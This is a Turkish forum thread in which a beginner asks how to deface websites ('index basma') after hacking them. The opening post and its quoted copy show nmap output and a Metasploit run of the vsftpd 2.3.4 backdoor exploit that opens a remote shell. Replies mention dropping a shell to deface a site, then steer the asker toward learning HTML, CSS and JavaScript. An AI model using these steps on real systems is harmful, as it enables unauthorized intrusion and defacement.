Msfconsole ftp acıkdan index basma

MysticEcho · 26 Eki 2024

Hepinize merhablar bir sorunum var internetten izlediğim kadarıyla sitelere hackledikten sonra kendi imzamızı atıyoruz(index) bunu ben yapmaya çalışırken bir sorunla karşılaşıtm yardımcı olabilecek varmı

yaptıklarım
nmap -sV site ip -p 21
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
Service Info: OS: Unix
msfconsole -q
msf6 > vsftpd
Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/ftp/vsftpd_232 2011-02-03 normal Yes VSFTPD 2.3.2 Denial of Service
1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution

burda 1 numarayı seciyorum
ondan sonra show options yapark gerekli port,ip ayarlarını yapıyorum
yaptıktan sonra run diyorum

iew the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST ipadresi
RHOST => ipadresi
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] ipadresi - Banner: 220 (vsFTPd 2.3.4)
[*] ipadresi - USER: 331 Please specify the password.
[+] ipadresi - Backdoor service has been spawned, handling...
Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.0.2.15:35543 -> 192.168.1.109:6200 (192.168.1.109)

burda 1 seciyorum
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions 1
[*] Starting interaction with 1...

böyle kalıyor izlediğim bir video da adamda 1,2 tane cıkıyor du bende 1 tane cıkıyor böyle kalıyor bir yerde
yanlış yaptım ama nerde daha önce böyle bir şey yaşayan biri varsa beni bilgilendirebilirmi

ip yazması gereken yerleri değiştirdim buraya konu acarken izlediğim video

Alastor · 26 Eki 2024

zafiyetli bir servisin kullanılması her zaman zafiyeti sömürebileceğin anlamına gelmiyor. bunun haricinde ne söyleyebilirim bilmiyorum

MysticEcho · 26 Eki 2024

Alastor' Alıntı:
zafiyetli bir servisin kullanılması her zaman zafiyeti sömürebileceğin anlamına gelmiyor. bunun haricinde ne söyleyebilirim bilmiyorum

Hocam Metasploitabla2 wep sitesi ne yapıyorum ip ile girdiğin

slowbaskan123 · 26 Eki 2024

MysticEcho' Alıntı:
Hepinize merhablar bir sorunum var internetten izlediğim kadarıyla sitelere hackledikten sonra kendi imzamızı atıyoruz(index) bunu ben yapmaya çalışırken bir sorunla karşılaşıtm yardımcı olabilecek varmı

yaptıklarım
nmap -sV site ip -p 21
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
Service Info: OS: Unix
msfconsole -q
msf6 > vsftpd
Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/ftp/vsftpd_232 2011-02-03 normal Yes VSFTPD 2.3.2 Denial of Service
1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution

burda 1 numarayı seciyorum
ondan sonra show options yapark gerekli port,ip ayarlarını yapıyorum
yaptıktan sonra run diyorum

iew the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST ipadresi
RHOST => ipadresi
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] ipadresi - Banner: 220 (vsFTPd 2.3.4)
[*] ipadresi - USER: 331 Please specify the password.
[+] ipadresi - Backdoor service has been spawned, handling...
Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.0.2.15:35543 -> 192.168.1.109:6200 (192.168.1.109)

burda 1 seciyorum
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions 1
[*] Starting interaction with 1...

böyle kalıyor izlediğim bir video da adamda 1,2 tane cıkıyor du bende 1 tane cıkıyor böyle kalıyor bir yerde
yanlış yaptım ama nerde daha önce böyle bir şey yaşayan biri varsa beni bilgilendirebilirmi

ip yazması gereken yerleri değiştirdim buraya konu acarken izlediğim video

Bendede session oluşturmuyordu metasploit sıkıntılı biraz.

MysticEcho · 26 Eki 2024

slowbaskan123' Alıntı:
Bendede session oluşturmuyordu metasploit sıkıntılı biraz.

Cok sacma bu ya 3 günden beri bunla uğraşıyorum

slowbaskan123 · 26 Eki 2024

MysticEcho' Alıntı:
Cok sacma bu ya 3 günden beri bunla uğraşıyorum

Malesef öyle fazla bilgim yok bu konuda bilen birisi vardı ama şuan etiket atamıyorum.

BlackPion · 26 Eki 2024

Seni hatırlıyorum sqlmap üzerinde de web hacking yapmaya çalışıyordun. Yapamayınca büyük ihtimal yöntem değiştirmişsin ama yine olmamış. Siteye admin olarak giriş yaptıktan sonra shell basarak kendi indexini basabilirsin. Fakat ondan önce bu işin temelini, mantığını öğrenmen gerekiyor. Web mantığını öğrenmeni öneririm. Yazılım çok önemli bir faktördür özellikle web yazılımı.

Web hacking yapmak istiyorsan yazılım mantığını kavraman şart. Çünkü bu işin temeli yazılımdır. Bir yazılımcı kod yazar diğer yazılımcı kodda ki hatayı bulur yararlanır kendi zararlı yazılımını entegre eder olay böyledir. Sana önerim direkt web hacking yapmadan önce html css javascript gibi temel web dillerini öğrenmen. Önce html ve css den başla. basit projeler geliştir css mantığını anla. html kolay da css'in mantığını oturtmak biraz zaman alıyor. Sonrasında css kütüphanelerini öğren. bootstrap, sass, less gibi. Sonrasında javasript öğrenmeye başla. Öğrendikten sonra javascript'in kütüphanelerini öğren. React.js, Vue.js Angular.js gibi.

Sonrasında daha derinlemesine webe giriş yaparsın. Front-end ile back-end arasındaki farkları öğren. Veri tabanı, APİ mantığını öğren. HTTP HTTPS mantığını öğren. Bir siteye kayıt olduğumuz zaman ve aylar sonra siteye tekrar giriş yaptığımız zaman site bizi nasıl hatırlıyor gibisinden. Front-end ile back-end nasıl bir birleri ile iletişim kuruyorlar gibisinden.

Sonrasında web güvenliğine geçersin. Açıklar, açıklar neden oluşur, nasıl oluşurlar, nasıl önlemler alırız gibi konuları araştır. Kali Linux üzerinden web scaning araçları mevcut onları kullanarak sitelerin güvenlik açıklarını taratabilirsin. Bunun mantığını anlamanı öneririm.

html dahi bilmeden, web hakkında hiç bir fikri olmayan fakat yine de web hacking yapmaya çalışan çok insan gördüm, hepsi elinde sonunda eli boş dönüyor. Senin gibi yöntem değiştiriyor ve yine aynı şekil de eli boş dönüyor. Temel atmadan, mantığını anlamadan bu işler yürümez. Önce kendi eğit sonra ne yapmak istersen yaparsın.

BlackPion · 26 Eki 2024

En azından FTP sunucusu nedir onu öğren, mantığını öğren. Her site de FTP açığı yoktur. İstediğin her siteye FTP sunucusunu kullanarak bir şeyler entegre edemezsin yetkin yoksa özellikle hiç edemezsin. FileZilla gibi FTP sunucusunu kurcala neymiş neyin nesiymiş gibi temel at kendine. Bu işlerin işleyişini öğren.

MysticEcho · 26 Eki 2024

BlackPion' Alıntı:
Seni hatırlıyorum sqlmap üzerinde de web hacking yapmaya çalışıyordun. Yapamayınca büyük ihtimal yöntem değiştirmişsin ama yine olmamış. Siteye admin olarak giriş yaptıktan sonra shell basarak kendi indexini basabilirsin. Fakat ondan önce bu işin temelini, mantığını öğrenmen gerekiyor. Web mantığını öğrenmeni öneririm. Yazılım çok önemli bir faktördür özellikle web yazılımı.

Web hacking yapmak istiyorsan yazılım mantığını kavraman şart. Çünkü bu işin temeli yazılımdır. Bir yazılımcı kod yazar diğer yazılımcı kodda ki hatayı bulur yararlanır kendi zararlı yazılımını entegre eder olay böyledir. Sana önerim direkt web hacking yapmadan önce html css javascript gibi temel web dillerini öğrenmen. Önce html ve css den başla. basit projeler geliştir css mantığını anla. html kolay da css'in mantığını oturtmak biraz zaman alıyor. Sonrasında css kütüphanelerini öğren. bootstrap, sass, less gibi. Sonrasında javasript öğrenmeye başla. Öğrendikten sonra javascript'in kütüphanelerini öğren. React.js, Vue.js Angular.js gibi.

Sonrasında daha derinlemesine webe giriş yaparsın. Front-end ile back-end arasındaki farkları öğren. Veri tabanı, APİ mantığını öğren. HTTP HTTPS mantığını öğren. Bir siteye kayıt olduğumuz zaman ve aylar sonra siteye tekrar giriş yaptığımız zaman site bizi nasıl hatırlıyor gibisinden. Front-end ile back-end nasıl bir birleri ile iletişim kuruyorlar gibisinden.

Sonrasında web güvenliğine geçersin. Açıklar, açıklar neden oluşur, nasıl oluşurlar, nasıl önlemler alırız gibi konuları araştır. Kali Linux üzerinden web scaning araçları mevcut onları kullanarak sitelerin güvenlik açıklarını taratabilirsin. Bunun mantığını anlamanı öneririm.

html dahi bilmeden, web hakkında hiç bir fikri olmayan fakat yine de web hacking yapmaya çalışan çok insan gördüm, hepsi elinde sonunda eli boş dönüyor. Senin gibi yöntem değiştiriyor ve yine aynı şekil de eli boş dönüyor. Temel atmadan, mantığını anlamadan bu işler yürümez. Önce kendi eğit sonra ne yapmak istersen yaparsın.

Teşekkürler abi cevap yazdığın icin html den başladım ondan sonra css e gecicem

BlackPion · 26 Eki 2024

MysticEcho' Alıntı:
Teşekkürler abi cevap yazdığın icin html den başladım ondan sonra css e gecicem

Estağfurullah abi demene gerek yoktu

En iyisini yapmışsın inan bana aradan biraz zaman geçsin, kafanda mantığı otursun web mantığı kafanda otursun o zaman beni anlayacaksın, o zaman neden web hackingi yapamadığını anlayacaksın.

ancients123 · 26 Eki 2024

Bulduğum kitapları paylaşmıştım içlerinde metasploit ile alakalı olan bir kitap var onu okumanı tavsiye ederim belki derdine derman olur

MysticEcho · 27 Eki 2024

BlackPion' Alıntı:
Estağfurullah abi demene gerek yoktu En iyisini yapmışsın inan bana aradan biraz zaman geçsin, kafanda mantığı otursun web mantığı kafanda otursun o zaman beni anlayacaksın, o zaman neden web hackingi yapamadığını anlayacaksın.

Tamamdır hocam başladım bügün ilk temel şeyleri öğrendim

BlackPion · 27 Eki 2024

MysticEcho' Alıntı:
Tamamdır hocam başladım bügün ilk temel şeyleri öğrendim

İyi, neleri öğrendin mesela?

MysticEcho · 27 Eki 2024

BlackPion' Alıntı:
İyi, neleri öğrendin mesela?

kurs alacak fazla param yok bilgisayarım da öyle böyle iyi değil not defterinden çalışıyorum bişeyler yapmaya çalışıyorum öğrendiklerim

HTML'ye Giriş ve HTML Etiketleri

font, h Etiketleri ve Renk Kodlarıyla Çalışma

img, ol, ul, li Etiketleri

bu youtube kanalından öğrenmeye çalışıyorum

Web OdasÄ±

BlackPion · 27 Eki 2024

MysticEcho' Alıntı:
kurs alacak fazla param yok bilgisayarım da öyle böyle iyi değil not defterinden çalışıyorum bişeyler yapmaya çalışıyorum öğrendiklerim

HTML'ye Giriş ve HTML Etiketleri
font, h Etiketleri ve Renk Kodlarıyla Çalışma
img, ol, ul, li Etiketleri
bu youtube kanalından öğrenmeye çalışıyorum
Web OdasÄ±

Yazdığın kodları gerçek zamanlı bir şekil de test de etmen gerekecek zaman zaman. Onun için de "Live Server" kullanman gerekecektir. vscode kullanmanı öneririm. Mavi ikonlu olan. Çok daha rahat edeceksin o kod editörünü kullanarak. Genel olarak html css ve javascript denildiği zaman akla o geliyor

MysticEcho · 27 Eki 2024

BlackPion' Alıntı:
Yazdığın kodları gerçek zamanlı bir şekil de test de etmen gerekecek zaman zaman. Onun için de "Live Server" kullanman gerekecektir. vscode kullanmanı öneririm. Mavi ikonlu olan. Çok daha rahat edeceksin o kod editörünü kullanarak. Genel olarak html css ve javascript denildiği zaman akla o geliyor

kullandığım tost makinem kaldırırmı acaba diyordum denemekten zarar gelmez dedim denedim ve kaldırdı şuanda onda yapıyorum gercekten ferahlık varmış
önerin icin teşekkür ederim

BlackPion · 27 Eki 2024

MysticEcho' Alıntı:
kullandığım tost makinem kaldırırmı acaba diyordum denemekten zarar gelmez dedim denedim ve kaldırdı şuanda onda yapıyorum gercekten ferahlık varmış
önerin icin teşekkür ederim

Rica ederim ne demek. Çok büyük donanımlar isteyen bir kod editörü değil. Ferahlamana sevindin

MysticEcho · 27 Eki 2024

BlackPion' Alıntı:
Çok büyük donanımlar isteyen bir kod editörü değil. Ferahlamana sevindin

harbi diyorum cok iyi birşey bu
cok rahat cok profosyonel

BlackPion · 27 Eki 2024

MysticEcho' Alıntı:
harbi diyorum cok iyi birşey bu
cok rahat cok profosyonel

Yıllardır bu işlerin içindeyiz bir şeyler bilelim yani bir zahmet değil mi

BlackPion · 27 Eki 2024

MysticEcho' Alıntı:
harbi diyorum cok iyi birşey bu
cok rahat cok profosyonel

Bu arada daha güncel derslere bakmanı öneririm kanala baktım videolar çok eski. Youtube üzerinde "Enes Bayram" kanalını öneririm. Daha güncel, anlatımı iyi bir hocadır.

Msfconsole ftp acıkdan index basma

Üye

Yeni üye

Üye

Kıdemli Üye

Üye

Kıdemli Üye

Kıdemli Üye

Kıdemli Üye

Üye

Kıdemli Üye

Kıdemli Üye

Üye

Kıdemli Üye

Üye

HTML'ye Giriş ve HTML Etiketleri​

font, h Etiketleri ve Renk Kodlarıyla Çalışma​

img, ol, ul, li Etiketleri​

bu youtube kanalından öğrenmeye çalışıyorum ​

Web OdasÄ±​

Kıdemli Üye

HTML'ye Giriş ve HTML Etiketleri​

font, h Etiketleri ve Renk Kodlarıyla Çalışma​

img, ol, ul, li Etiketleri​

bu youtube kanalından öğrenmeye çalışıyorum ​

Web OdasÄ±​

Üye

Kıdemli Üye

Üye

Kıdemli Üye

Kıdemli Üye

HTML'ye Giriş ve HTML Etiketleri

font, h Etiketleri ve Renk Kodlarıyla Çalışma

img, ol, ul, li Etiketleri

bu youtube kanalından öğrenmeye çalışıyorum

Web OdasÄ±

HTML'ye Giriş ve HTML Etiketleri

font, h Etiketleri ve Renk Kodlarıyla Çalışma

img, ol, ul, li Etiketleri

bu youtube kanalından öğrenmeye çalışıyorum

Web OdasÄ±